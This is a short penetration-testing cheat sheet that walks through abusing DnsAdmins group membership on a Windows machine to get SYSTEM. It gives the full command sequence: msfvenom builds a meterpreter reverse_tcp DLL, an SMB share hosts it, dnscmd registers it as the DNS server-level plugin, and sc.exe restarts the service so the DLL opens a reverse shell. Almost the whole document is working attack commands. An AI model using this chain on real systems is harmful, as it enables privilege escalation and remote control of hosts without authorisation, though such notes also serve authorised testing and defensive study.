DNSadmins group

# If you control any account member of the "DnsAdmin" group
# You can use it to privesc on the machine

# It works by adding a malicious DLL loaded by the DNS service.
# You have to restart the service and the DLL will be loaded as SYSTEM
# Generating the DLL
$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=5566 -f dll > privesc.dll

# Host the DLL on a SMD server or upload it on the target machine
$ sudo smbserver.py MYSHARE /path/to/dll -smb2support

# On the target machine, update the DNS configuration and give it the DLL
PS > dnscmd /config /serverlevelplugindll \\\TESTLOL\privesc.dll

# You can check if the DLL has been correctly loaded
PS > Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

# Then restart the DNS service
PS > sc.exe stop dns
PS > sc.exe query dns
PS > sc.exe start dns

# If the exploit worked you should get a meterpreter